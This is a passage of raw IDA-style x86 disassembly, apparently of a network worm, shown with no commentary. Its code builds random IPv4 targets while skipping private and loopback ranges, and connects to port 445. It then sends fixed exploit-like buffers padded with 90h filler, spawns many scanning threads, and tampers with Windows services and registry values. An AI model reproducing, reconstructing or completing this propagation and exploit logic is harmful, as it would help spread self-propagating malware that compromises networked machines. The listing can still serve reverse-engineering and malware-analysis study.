= byte ptr -89E3h var_89E2 = word ptr -89E2h var_89E0 = byte ptr -89E0h var_89D8 = byte ptr -89D8h var_8970 = byte ptr -8970h var_6900 = byte ptr -6900h var_68E2 = byte ptr -68E2h var_6842 = byte ptr -6842h var_6136 = dword ptr -6136h var_6126 = byte ptr -6126h var_6112 = byte ptr -6112h var_60A2 = byte ptr -60A2h var_55DE = byte ptr -55DEh var_403A = byte ptr -403Ah var_4039 = byte ptr -4039h var_3FBD = byte ptr -3FBDh var_37ED = byte ptr -37EDh var_3342 = byte ptr -3342h var_3058 = dword ptr -3058h var_3054 = dword ptr -3054h var_3050 = dword ptr -3050h var_304C = word ptr -304Ch var_304A = word ptr -304Ah var_3048 = dword ptr -3048h var_303C = byte ptr -303Ch var_3039 = byte ptr -3039h var_300F = byte ptr -300Fh var_300D = byte ptr -300Dh var_300C = byte ptr -300Ch var_2FC7 = byte ptr -2FC7h var_2F83 = byte ptr -2F83h var_2987 = byte ptr -2987h var_21A3 = byte ptr -21A3h var_2193 = byte ptr -2193h var_1E6F = byte ptr -1E6Fh var_1E6B = byte ptr -1E6Bh var_1E5F = byte ptr -1E5Fh var_1BDA = byte ptr -1BDAh var_1BD9 = byte ptr -1BD9h var_B46 = byte ptr -0B46h var_82 = byte ptr -82h var_81 = byte ptr -81h var_80 = dword ptr -80h var_7C = byte ptr -7Ch var_54 = dword ptr -54h var_50 = byte ptr -50h var_4F = byte ptr -4Fh arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp mov eax, 89F4h call sub_41E4A5 push ebx push esi push edi mov [ebp+var_3054], 1 mov [ebp+var_89F0], 1 lea edi, [ebp+var_89E0] lea esi, loc_4049EF+1 movsd movsd and [ebp+var_89F4], 0 mov [ebp+var_89E2], 1BDh push 0 push 1 push 2 call sub_41E41D mov [ebp+var_54], eax cmp eax, 0FFFFFFFFh jz loc_41DBBF mov eax, [ebp+arg_0] mov [ebp+var_89EC], eax push eax call sub_41E3E1 push 1Dh push eax lea edi, [ebp+var_6900] push edi call sub_41E5BD lea eax, [ebp+var_6900] push eax push 404D5Ah lea eax, [ebp+var_7C] push eax call sub_41E749 add esp, 0Ch xor ebx, ebx loc_41D5FA: ; CODE XREF: sub_41D569+A2j mov dl, [ebp+ebx+var_7C] mov [ebp+ebx*2+var_50], dl mov [ebp+ebx*2+var_4F], 0 inc ebx cmp ebx, 28h jl short loc_41D5FA push 60h push 404525h lea eax, [ebp+var_303C] push eax call sub_41E70D lea eax, [ebp+var_7C] push eax call sub_41E5C9 mov edi, eax shl edi, 1 push edi lea edi, [ebp+var_50] push edi lea edi, [ebp+var_300C] push edi call sub_41E70D lea eax, [ebp+var_7C] push eax call sub_41E5C9 push 9 push offset sub_40457C mov edi, eax shl edi, 1 lea edi, [ebp+edi+var_300D] push edi call sub_41E70D lea eax, [ebp+var_7C] push eax call sub_41E5C9 mov edx, eax movsx edi, dl shl edi, 1 add edi, 34h mov edx, edi mov [ebp+var_403A], dl push 1 lea eax, [ebp+var_403A] push eax lea eax, [ebp+var_3039] push eax call sub_41E70D lea eax, [ebp+var_7C] push eax call sub_41E5C9 mov edx, eax movsx edi, dl shl edi, 1 add edi, 9 mov edx, edi mov [ebp+var_89E3], dl push 1 lea eax, [ebp+var_89E3] push eax lea eax, [ebp+var_300F] push eax call sub_41E70D mov eax, [ebp+arg_4] mov [ebp+var_3058], eax push 0E29h push 31h lea eax, [ebp+var_4039] push eax call sub_41E719 add esp, 48h push 10h lea eax, [ebp+var_304C] push eax call sub_41E5A5 mov [ebp+var_304C], 2 movsx eax, [ebp+var_89E2] movzx eax, ax push eax call sub_41E3C9 mov edi, eax mov [ebp+var_304A], di mov eax, [ebp+arg_0] mov [ebp+var_3048], eax push 10h lea eax, [ebp+var_304C] push eax push [ebp+var_54] call sub_41E3A5 cmp eax, 0FFFFFFFFh jnz short loc_41D73C mov [ebp+var_3054], 2 jmp loc_41DBB7 ; --------------------------------------------------------------------------- loc_41D73C: ; CODE XREF: sub_41D569+1C2j push 64h call sub_41E5B1 push 0 push 89h push offset sub_404313 push [ebp+var_54] call sub_41E405 cmp eax, 0FFFFFFFFh jnz short $+2 push 64h call sub_41E5B1 push 0 push 640h lea eax, [ebp+var_2FC7] push eax push [ebp+var_54] call sub_41E3F9 mov [ebp+var_80], eax cmp eax, 0FFFFFFFFh jz loc_41DBAD push 0 push 0A8h push 40439Dh push [ebp+var_54] call sub_41E405 cmp eax, 0FFFFFFFFh jnz short $+2 push 64h call sub_41E5B1 push 0 push 640h lea eax, [ebp+var_2FC7] push eax push [ebp+var_54] call sub_41E3F9 mov [ebp+var_80], eax cmp eax, 0FFFFFFFFh jz loc_41DBAD push 0 push 0DEh push 404446h push [ebp+var_54] call sub_41E405 cmp eax, 0FFFFFFFFh jnz short $+2 push 64h call sub_41E5B1 push 0 push 640h lea eax, [ebp+var_2FC7] push eax push [ebp+var_54] call sub_41E3F9 mov [ebp+var_80], eax cmp eax, 0FFFFFFFFh jz loc_41DBAD mov eax, [ebp+var_80] cmp eax, 0FFFFFFFFh jz short loc_41D816 cmp eax, 46h jge short loc_41D81B loc_41D816: ; CODE XREF: sub_41D569+2A6j jmp loc_41DBAD ; --------------------------------------------------------------------------- loc_41D81B: ; CODE XREF: sub_41D569+2ABj lea eax, [ebp+var_2F83] mov [ebp+var_89E8], eax cmp byte ptr [eax], 31h setnz al and eax, 1 mov [ebp+var_3050], eax jz loc_41D92F push 0DACh push 90h lea eax, [ebp+var_2987] push eax call sub_41E719 push 4 imul eax, [ebp+var_3050], 3Ch lea eax, ds:404938h[eax] push eax lea eax, [ebp+var_21A3] push eax call sub_41E70D push [ebp+arg_8] push [ebp+var_3058] lea eax, [ebp+var_2193] push eax call sub_41E70D push 4 push 404D55h lea eax, [ebp+var_1E6F] push eax call sub_41E70D push 4 imul eax, [ebp+var_3050], 3Ch lea eax, ds:404938h[eax] push eax lea eax, [ebp+var_1E6B] push eax call sub_41E70D push [ebp+var_3058] call sub_41E5C9 push eax push [ebp+var_3058] lea edi, [ebp+var_1E5F] push edi call sub_41E70D add esp, 48h xor ebx, ebx loc_41D8D7: ; CODE XREF: sub_41D569+38Bj mov dl, [ebp+ebx+var_2987] mov [ebp+ebx*2+var_1BDA], dl mov [ebp+ebx*2+var_1BD9], 0 inc ebx cmp ebx, 0DACh jl short loc_41D8D7 mov [ebp+var_82], 0 mov [ebp+var_81], 0 push 1C52h push 31h lea eax, [ebp+var_89D8] push eax call sub_41E719 push 1C52h push 31h lea eax, [ebp+var_6112] push eax call sub_41E719 add esp, 18h jmp short loc_41D991 ; --------------------------------------------------------------------------- loc_41D92F: ; CODE XREF: sub_41D569+2CDj push 7D0h push 90h lea eax, [ebp+var_68E2] push eax call sub_41E719 push [ebp+var_3058] call sub_41E5C9 push eax push [ebp+var_3058] lea edi, [ebp+var_6842] push edi call sub_41E70D lea eax, [ebp+var_89E0] push eax call sub_41E5C9 push eax lea edi, [ebp+var_89E0] push edi lea edi, [ebp+var_6126] push edi call sub_41E70D add esp, 24h mov eax, dword ptr ds:loc_404935+3 mov [ebp+var_6136], eax loc_41D991: ; CODE XREF: sub_41D569+3C4j push 0 movsx eax, [ebp+var_403A] add eax, 4 push eax lea eax, [ebp+var_303C] push eax push [ebp+var_54] call sub_41E405 cmp eax, 0FFFFFFFFh jnz short $+2 push 64h call sub_41E5B1 push 0 push 640h lea eax, [ebp+var_2FC7] push eax push [ebp+var_54] call sub_41E3F9 mov [ebp+var_80], eax cmp eax, 0FFFFFFFFh jz loc_41DBAD push 0 push 68h push 404586h push [ebp+var_54] call sub_41E405 cmp eax, 0FFFFFFFFh jnz short $+2 push 64h call sub_41E5B1 push 0 push 640h lea eax, [ebp+var_2FC7] push eax push [ebp+var_54] call sub_41E3F9 mov [ebp+var_80], eax cmp eax, 0FFFFFFFFh jz loc_41DBAD push 0 push 0A0h push 4045EFh push [ebp+var_54] call sub_41E405 cmp eax, 0FFFFFFFFh jnz short $+2 push 64h call sub_41E5B1 push 0 push 640h lea eax, [ebp+var_2FC7] push eax push [ebp+var_54] call sub_41E3F9 mov [ebp+var_80], eax cmp eax, 0FFFFFFFFh jz loc_41DBAD cmp [ebp+var_3050], 0 jz loc_41DB39 push 68h push offset sub_40479E lea eax, [ebp+var_89D8] push eax call sub_41E70D push 1B5Ah lea eax, [ebp+var_1BDA] push eax lea eax, [ebp+var_8970] push eax call sub_41E70D push 70h push 404807h lea eax, [ebp+var_6112] push eax call sub_41E70D push 0A5Eh lea eax, [ebp+var_B46] push eax lea eax, [ebp+var_60A2] push eax call sub_41E70D push 84h push offset sub_404878 lea eax, [ebp+var_55DE] push eax call sub_41E70D add esp, 3Ch push 0 push 10FCh lea eax, [ebp+var_89D8] push eax push [ebp+var_54] call sub_41E405 cmp eax, 0FFFFFFFFh jnz short $+2 push 64h call sub_41E5B1 push 0 push 640h lea eax, [ebp+var_2FC7] push eax push [ebp+var_54] call sub_41E3F9 mov [ebp+var_80], eax cmp eax, 0FFFFFFFFh jz loc_41DBAD push 0 push 0FDCh lea eax, [ebp+var_6112] push eax push [ebp+var_54] call sub_41E405 cmp eax, 0FFFFFFFFh jnz short loc_41DB9F jmp short loc_41DB9F ; --------------------------------------------------------------------------- loc_41DB39: ; CODE XREF: sub_41D569+4FAj push 7Ch push 404690h lea eax, [ebp+var_4039] push eax call sub_41E70D push 7D0h lea eax, [ebp+var_68E2] push eax lea eax, [ebp+var_3FBD] push eax call sub_41E70D push 90h push 40470Dh lea eax, [ebp+var_37ED] push eax call sub_41E70D add esp, 24h mov [ebp+var_3342], 0 push 0 push 0CF8h lea eax, [ebp+var_4039] push eax push [ebp+var_54] call sub_41E405 cmp eax, 0FFFFFFFFh jnz short $+2 loc_41DB9F: ; CODE XREF: sub_41D569+5CCj ; sub_41D569+5CEj push 64h call sub_41E5B1 and [ebp+var_3054], 0 loc_41DBAD: ; CODE XREF: sub_41D569+216j ; sub_41D569+258j ... push 2 push [ebp+var_54] call sub_41E411 loc_41DBB7: ; CODE XREF: sub_41D569+1CEj push [ebp+var_54] call sub_41E399 loc_41DBBF: ; CODE XREF: sub_41D569+53j mov eax, [ebp+var_3054] pop edi pop esi pop ebx leave retn sub_41D569 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41DBCA proc near ; CODE XREF: .data:loc_41DC3Ep var_32 = byte ptr -32h push ebp mov ebp, esp sub esp, 34h push esi push edi push 31h lea eax, [ebp+var_32] push eax call sub_41E3BD cmp eax, 0FFFFFFFFh jnz short loc_41DBE6 xor eax, eax jmp short loc_41DC00 ; --------------------------------------------------------------------------- loc_41DBE6: ; CODE XREF: sub_41DBCA+16j lea eax, [ebp+var_32] push eax call sub_41E3B1 mov edi, eax or edi, edi jnz short loc_41DBF9 xor eax, eax jmp short loc_41DC00 ; --------------------------------------------------------------------------- loc_41DBF9: ; CODE XREF: sub_41DBCA+29j mov eax, [edi+0Ch] mov esi, [eax] mov eax, [esi] loc_41DC00: ; CODE XREF: sub_41DBCA+1Aj ; sub_41DBCA+2Dj pop edi pop esi leave retn sub_41DBCA endp ; sp-analysis failed ; --------------------------------------------------------------------------- push ebp mov ebp, esp sub esp, 13Ch push ebx push esi push edi call sub_41E539 push eax call sub_41E755 mov esi, 254h mov eax, esi add eax, 0Ah push eax push 0 call sub_41E575 mov ebx, eax push esi push 4040BFh push ebx call sub_41E70D add esp, 10h loc_41DC3E: ; CODE XREF: .data:0041DC58j ; .data:0041DC92j ... call sub_41DBCA mov [ebp-10Ch], eax or eax, eax jnz short loc_41DC5A push 384h call sub_41E6F5 pop ecx jmp short loc_41DC3E ; --------------------------------------------------------------------------- loc_41DC5A: ; CODE XREF: .data:0041DC4Bj mov al, [ebp-10Ch] mov [ebp-111h], al mov al, [ebp-10Bh] mov [ebp-112h], al mov al, [ebp-10Ah] mov [ebp-135h], al cmp byte ptr [ebp-111h], 7Fh jnz short loc_41DC94 push 384h call sub_41E6F5 pop ecx jmp short loc_41DC3E ; --------------------------------------------------------------------------- loc_41DC94: ; CODE XREF: .data:0041DC85j lea eax, [ebp-130h] push eax call sub_41D468 push 0 call sub_41E6F5 add esp, 8 call sub_41E731 mov ecx, 0FDh cdq idiv ecx mov edi, edx inc edi mov edx, edi mov [ebp-134h], dl call sub_41E731 mov ecx, 0FDh cdq idiv ecx mov edi, edx inc edi mov edx, edi mov [ebp-131h], dl call sub_41E731 mov ecx, 0FDh cdq idiv ecx mov edi, edx inc edi mov edx, edi mov [ebp-132h], dl call sub_41E731 mov ecx, 0Ah cdq idiv ecx mov [ebp-133h], dl mov al, [ebp-133h] cmp al, 5 jnb short loc_41DD31 mov al, [ebp-112h] mov [ebp-134h], al mov al, [ebp-133h] cmp al, 3 jnb short loc_41DD31 mov al, [ebp-135h] mov [ebp-131h], al loc_41DD31: ; CODE XREF: .data:0041DD0Dj ; .data:0041DD23j cmp byte ptr [ebp-111h], 0Ah jnz short loc_41DD66 movzx eax, byte ptr [ebp-132h] push eax movzx eax, byte ptr [ebp-131h] push eax movzx eax, byte ptr [ebp-134h] push eax push 404D49h lea eax, [ebp-130h] push eax call sub_41E749 add esp, 14h loc_41DD66: ; CODE XREF: .data:0041DD38j movzx eax, byte ptr [ebp-111h] cmp eax, 0ACh jnz short loc_41DDC0 mov al, [ebp-112h] cmp al, 0Fh jbe short loc_41DDC0 cmp al, 21h jnb short loc_41DDC0 call sub_41E731 movzx edi, byte ptr [ebp-132h] push edi movzx edi, byte ptr [ebp-131h] push edi mov edx, eax and edx, 8000000Fh jge short loc_41DDA6 dec edx or edx, 0FFFFFFF0h inc edx loc_41DDA6: ; CODE XREF: .data:0041DD9Fj mov edi, edx add edi, 10h push edi push 404D3Ch lea edi, [ebp-130h] push edi call sub_41E749 add esp, 14h loc_41DDC0: ; CODE XREF: .data:0041DD72j ; .data:0041DD7Cj ... movzx eax, byte ptr [ebp-111h] cmp eax, 0C0h jnz short loc_41DE00 movzx eax, byte ptr [ebp-112h] cmp eax, 0A8h jnz short loc_41DE00 movzx eax, byte ptr [ebp-132h] push eax movzx eax, byte ptr [ebp-131h] push eax push 404D2Eh lea eax, [ebp-130h] push eax call sub_41E749 add esp, 10h loc_41DE00: ; CODE XREF: .data:0041DDCCj ; .data:0041DDDAj lea eax, [ebp-130h] push eax call sub_41E3D5 cmp [ebp-10Ch], eax jz loc_41DC3E push dword ptr [ebp-10Ch] call sub_41E3E1 movzx edi, word ptr ds:loc_404092+2 push edi push eax push 404D27h lea edi, [ebp-0FFh] push edi call sub_41E749 add esp, 10h loc_41DE40: ; CODE XREF: .data:0041DE69j lea ecx, [ebp-0FFh] or eax, 0FFFFFFFFh loc_41DE49: ; CODE XREF: .data:0041DE4Ej inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_41DE49 cmp eax, 19h jz short loc_41DE6B push 404D25h lea eax, [ebp-0FFh] push eax call sub_41E761 add esp, 8 jmp short loc_41DE40 ; --------------------------------------------------------------------------- loc_41DE6B: ; CODE XREF: .data:0041DE53j lea ecx, [ebp-0FFh] or eax, 0FFFFFFFFh loc_41DE74: ; CODE XREF: .data:0041DE79j inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_41DE74 push eax lea edi, [ebp-0FFh] push edi mov edi, ebx add edi, 9 push edi call sub_41E70D add esp, 0Ch lea eax, [ebp-130h] push eax call sub_41E3D5 push esi push ebx push eax call sub_41D569 add esp, 0Ch mov [ebp-13Ch], eax push 0 call sub_41E6F5 add esp, 4 jmp loc_41DC3E ; --------------------------------------------------------------------------- db 5Fh, 5Eh, 5Bh dd 4C2C9h ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41DEC4 proc near ; CODE XREF: .data:0041DF06p var_4 = dword ptr -4 push ebp mov ebp, esp push ecx call sub_41E545 cmp eax, 80000000h jb short loc_41DEDB mov eax, 3Ch jmp short locret_41DEFC ; --------------------------------------------------------------------------- loc_41DEDB: ; CODE XREF: sub_41DEC4+Ej push 0 lea eax, [ebp+var_4] push eax call sub_41E429 and [ebp+var_4], 2 cmp [ebp+var_4], 2 jnz short loc_41DEF7 mov eax, 12Ch jmp short locret_41DEFC ; --------------------------------------------------------------------------- loc_41DEF7: ; CODE XREF: sub_41DEC4+2Aj mov eax, 64h locret_41DEFC: ; CODE XREF: sub_41DEC4+15j ; sub_41DEC4+31j leave retn sub_41DEC4 endp ; --------------------------------------------------------------------------- push ebp mov ebp, esp push ecx push eax push ebx push esi push edi call sub_41DEC4 mov ebx, eax lea eax, [ebp-4] push eax push 0 push 0 push offset sub_401565 push 0 push 0 call sub_41E5D5 push eax call sub_41E52D xor esi, esi jmp short loc_41DF5F ; --------------------------------------------------------------------------- loc_41DF2D: ; CODE XREF: .data:0041DF61j lea eax, [ebp-4] push eax push 0 push 0 push offset sub_401E23 push 0 push 0 call sub_41E5D5 push eax call sub_41E52D mov eax, 0EA60h xor edx, edx div ebx mov [ebp-8], eax mov edi, eax push eax call sub_41E6F5 pop ecx inc esi loc_41DF5F: ; CODE XREF: .data:0041DF2Bj cmp esi, ebx jb short loc_41DF2D pop edi pop esi pop ebx leave retn 4 ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41DF6A proc near ; CODE XREF: sub_41E239+ACp var_388 = dword ptr -388h var_384 = dword ptr -384h var_380 = dword ptr -380h var_37C = dword ptr -37Ch var_378 = dword ptr -378h var_374 = dword ptr -374h var_370 = dword ptr -370h var_36C = byte ptr -36Ch var_16C = dword ptr -16Ch var_168 = byte ptr -168h var_164 = dword ptr -164h var_28 = dword ptr -28h var_24 = dword ptr -24h var_20 = byte ptr -20h var_1C = dword ptr -1Ch var_4 = dword ptr -4 push ebp mov ebp, esp sub esp, 388h push ebx push esi push edi lea edi, [ebp+var_16C] lea esi, loc_404A37+1 mov ecx, 51h rep movsd and [ebp+var_24], 0 loc_41DF8D: ; CODE XREF: sub_41DF6A+211j push 0F003Fh push 0 push 0 call sub_41E67D mov [ebp+var_28], eax or eax, eax jz loc_41E174 push 0F003Fh mov eax, 0Ch mul [ebp+var_24] mov [ebp+var_370], eax push [ebp+eax+var_16C] push [ebp+var_28] call sub_41E689 mov ebx, eax or eax, eax jz loc_41E16C lea eax, [ebp+var_20] push eax push 1 push ebx call sub_41E665 mov [ebp+var_4], eax and [ebp+var_4], 0 loc_41DFE5: ; CODE XREF: sub_41DF6A+A4j lea eax, [ebp+var_20] push eax push 4 push ebx call sub_41E665 or eax, eax jz short loc_41DFFB cmp [ebp+var_1C], 1 jnz short loc_41DFFD loc_41DFFB: ; CODE XREF: sub_41DF6A+89j jmp short loc_41E010 ; --------------------------------------------------------------------------- loc_41DFFD: ; CODE XREF: sub_41DF6A+8Fj push 3E8h call sub_41E5B1 inc [ebp+var_4] cmp [ebp+var_4], 0Ah jb short loc_41DFE5 loc_41E010: ; CODE XREF: sub_41DF6A:loc_41DFFBj mov eax, 0Ch mul [ebp+var_24] mov [ebp+var_374], eax cmp [ebp+eax+var_168], 0 jz short loc_41E02E push ebx call sub_41E671 loc_41E02E: ; CODE XREF: sub_41DF6A+BCj push ebx call sub_41E659 mov eax, 0Ch mul [ebp+var_24] mov [ebp+var_378], eax cmp [ebp+eax+var_164], 0 jz loc_41E16C mov eax, 0Ch mul [ebp+var_24] mov [ebp+var_37C], eax mov eax, [ebp+eax+var_164] cmp byte ptr [eax], 0 jnz loc_41E0F4 push 0 push 18h lea eax, [ebp+var_36C] push eax push 0 call sub_41E435 or eax, eax jz short loc_41E0F4 lea ecx, [ebp+var_36C] or eax, 0FFFFFFFFh loc_41E08D: ; CODE XREF: sub_41DF6A+128j inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_41E08D mov [ebp+var_4], eax cmp [ebp+var_4], 1 jbe short loc_41E0C1 mov eax, [ebp+var_4] sub eax, 1 cmp [ebp+eax+var_36C], 5Ch jz short loc_41E0C1 push offset sub_404BA0 lea eax, [ebp+var_36C] push eax call sub_41E761 add esp, 8 loc_41E0C1: ; CODE XREF: sub_41DF6A+131j ; sub_41DF6A+141j mov eax, 0Ch mul [ebp+var_24] mov [ebp+var_380], eax mov eax, [ebp+eax+var_164] push dword ptr [eax+8] lea eax, [ebp+var_36C] push eax call sub_41E761 add esp, 8 lea eax, [ebp+var_36C] push eax call sub_41E5E1 loc_41E0F4: ; CODE XREF: sub_41DF6A+FEj ; sub_41DF6A+118j mov eax, 0Ch mul [ebp+var_24] mov [ebp+var_380], eax mov eax, [ebp+eax+var_164] cmp byte ptr [eax], 1 jnz short loc_41E16C lea eax, [ebp+var_4] push eax push 20006h push 0 mov eax, 0Ch mul [ebp+var_24] mov [ebp+var_384], eax mov edx, [ebp+eax+var_164] push dword ptr [edx+4] mov eax, [ebp+eax+var_164] push dword ptr [eax+0Ch] call sub_41E6B9 or eax, eax jnz short loc_41E16C mov eax, 0Ch mul [ebp+var_24] mov [ebp+var_388], eax mov eax, [ebp+eax+var_164] push dword ptr [eax+8] push [ebp+var_4] call sub_41E695 push [ebp+var_4] call sub_41E6AD loc_41E16C: ; CODE XREF: sub_41DF6A+62j ; sub_41DF6A+E0j ... push [ebp+var_28] call sub_41E659 loc_41E174: ; CODE XREF: sub_41DF6A+36j inc [ebp+var_24] cmp [ebp+var_24], 1Bh jb loc_41DF8D pop edi pop esi pop ebx leave retn 4 sub_41DF6A endp ; sp-analysis failed ; --------------------------------------------------------------------------- push ebp mov ebp, esp sub esp, 10h push edi mov eax, [ebp+0Ch] cmp eax, 10h jz short loc_41E216 jg short loc_41E1A3 cmp eax, 2 jz short loc_41E20D jmp loc_41E223 ; --------------------------------------------------------------------------- loc_41E1A3: ; CODE XREF: .data:0041E197j cmp eax, 113h jnz short loc_41E223 and dword ptr [ebp-4], 0 mov dword ptr [ebp-8], 4 lea eax, [ebp-10h] push eax lea eax, [ebp-8] push eax lea eax, [ebp-4] push eax push 404B81h push 404B85h push 80000001h call sub_41D1A8 mov eax, dword ptr ds:loc_404096+2 mov [ebp-0Ch], eax add [ebp-4], eax push 4 push 4 lea eax, [ebp-4] push eax push 404B81h push 404B85h push 80000001h call sub_41D13D add esp, 30h push 0 push 404098h call sub_41E55D jmp short loc_41E234 ; --------------------------------------------------------------------------- loc_41E20D: ; CODE XREF: .data:0041E19Cj push 0 call sub_41E629 jmp short loc_41E234 ; --------------------------------------------------------------------------- loc_41E216: ; CODE XREF: .data:0041E195j push dword ptr ds:loc_403000 call sub_41E641 jmp short loc_41E234 ; --------------------------------------------------------------------------- loc_41E223: ; CODE XREF: .data:0041E19Ej ; .data:0041E1A8j push dword ptr [ebp+14h] push dword ptr [ebp+10h] push dword ptr [ebp+0Ch] push dword ptr [ebp+8] call sub_41E64D loc_41E234: ; CODE XREF: .data:0041E20Bj ; .data:0041E214j ... pop edi leave retn 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41E239 proc near ; CODE XREF: sub_41E441+5Cp var_2DC = byte ptr -2DCh var_2D8 = byte ptr -2D8h var_148 = dword ptr -148h var_143 = byte ptr -143h var_44 = dword ptr -44h var_40 = dword ptr -40h var_3C = dword ptr -3Ch var_38 = dword ptr -38h var_34 = dword ptr -34h var_30 = dword ptr -30h var_2C = dword ptr -2Ch var_28 = dword ptr -28h var_24 = dword ptr -24h var_20 = dword ptr -20h var_1C = byte ptr -1Ch arg_0 = dword ptr 8 arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 2DCh push edi mov edi, [ebp+arg_0] push [ebp+arg_8] push offset sub_403010 call sub_41E4C5 push 404B7Ch lea eax, [ebp+var_143] push eax call sub_41E749 and [ebp+var_44], 0 lea eax, loc_4023A4+3 mov [ebp+var_40], eax and [ebp+var_3C], 0 and [ebp+var_38], 0 mov [ebp+var_34], edi and [ebp+var_30], 0 and [ebp+var_2C], 0 and [ebp+var_28], 0 and [ebp+var_24], 0 lea eax, [ebp+var_143] mov [ebp+var_20], eax lea eax, [ebp+var_44] push eax call sub_41E5F9 push 0 push edi push 0 push 0 push 0 push 0 push 0 push 0 push 0CF0000h push 404D25h lea eax, [ebp+var_143] push eax push 0 call sub_41E635 mov dword ptr ds:loc_403000, eax call sub_41E509 push eax call sub_41D118 lea eax, [ebp+var_2D8] push eax push 2 call sub_41E375 push 0 call sub_41DF6A lea eax, [ebp+var_2DC] push eax push 0 push 0 push 40211Dh push 0 push 0 call sub_41E5D5 push eax call sub_41E52D and [ebp+var_148], 0 push 4 push 4 lea eax, [ebp+var_148] push eax push 404B81h push 404B85h push 80000001h call sub_41D13D add esp, 24h push 0 push 2710h push 1 push dword ptr ds:loc_403000 call sub_41E5ED jmp short loc_41E35A ; --------------------------------------------------------------------------- loc_41E348: ; CODE XREF: sub_41E239+132j lea eax, [ebp+var_1C] push eax call sub_41E611 lea eax, [ebp+var_1C] push eax call sub_41E61D loc_41E35A: ; CODE XREF: sub_41E239+10Dj push 0 push 0 push 0 lea eax, [ebp+var_1C] push eax call sub_41E605 or eax, eax jnz short loc_41E348 pop edi leave retn 10h sub_41E239 endp ; sp-analysis failed ; --------------------------------------------------------------------------- align 4 db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E375 proc near ; CODE XREF: sub_41E239+A5p jmp dword ptr ds:loc_40524B+1 sub_41E375 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E381 proc near ; CODE XREF: .data:0041D43Fp jmp dword ptr ds:loc_405250 sub_41E381 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E38D proc near ; CODE XREF: .data:0041D40Cp jmp dword ptr ds:loc_405250+4 sub_41E38D endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E399 proc near ; CODE XREF: .data:0041D33Ap ; sub_41D569+651p jmp dword ptr ds:loc_405255+3 sub_41E399 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E3A5 proc near ; CODE XREF: sub_41D569+1BAp jmp dword ptr ds:loc_40525B+1 sub_41E3A5 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E3B1 proc near ; CODE XREF: sub_41DBCA+20p jmp dword ptr ds:loc_40525B+5 sub_41E3B1 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E3BD proc near ; CODE XREF: sub_41DBCA+Ep jmp dword ptr ds:loc_405261+3 sub_41E3BD endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E3C9 proc near ; CODE XREF: .data:0041D3FAp ; sub_41D569+197p jmp dword ptr ds:loc_405267+1 sub_41E3C9 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E3D5 proc near ; CODE XREF: .data:0041DE07p ; .data:0041DE98p jmp dword ptr ds:loc_40526C sub_41E3D5 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E3E1 proc near ; CODE XREF: sub_41D569+63p ; .data:0041DE1Ep jmp dword ptr ds:loc_405270 sub_41E3E1 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E3ED proc near ; CODE XREF: .data:0041D42Ap jmp dword ptr ds:loc_405274 sub_41E3ED endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E3F9 proc near ; CODE XREF: .data:0041D21Ap ; sub_41D569+20Bp ... jmp dword ptr ds:loc_405278 sub_41E3F9 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E405 proc near ; CODE XREF: .data:0041D26Cp ; .data:0041D2A8p ... jmp dword ptr ds:loc_405278+4 sub_41E405 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E411 proc near ; CODE XREF: .data:0041D332p ; sub_41D569+649p jmp dword ptr ds:loc_40527D+3 sub_41E411 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E41D proc near ; CODE XREF: .data:0041D3C3p ; sub_41D569+48p jmp dword ptr ds:loc_405284 sub_41E41D endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E429 proc near ; CODE XREF: sub_41DEC4+1Dp jmp dword ptr ds:loc_40528D+3 sub_41E429 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E435 proc near ; CODE XREF: sub_41DF6A+111p jmp dword ptr ds:loc_405299+3 sub_41E435 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41E441 proc near ; CODE XREF: .data:0041D060p var_4 = dword ptr -4 push ebp mov ebp, esp push ecx push edi call sub_41E4FD mov edi, eax cmp byte ptr [edi], 22h jnz short loc_41E475 push 22h mov eax, edi inc eax push eax call sub_41E76D add esp, 8 mov [ebp+var_4], eax or eax, eax jz short loc_41E490 mov edi, eax inc edi jmp short 